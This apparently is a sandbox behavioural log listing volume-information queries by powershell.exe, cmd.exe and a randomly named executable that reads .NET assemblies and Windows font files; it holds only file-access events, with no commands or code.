Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
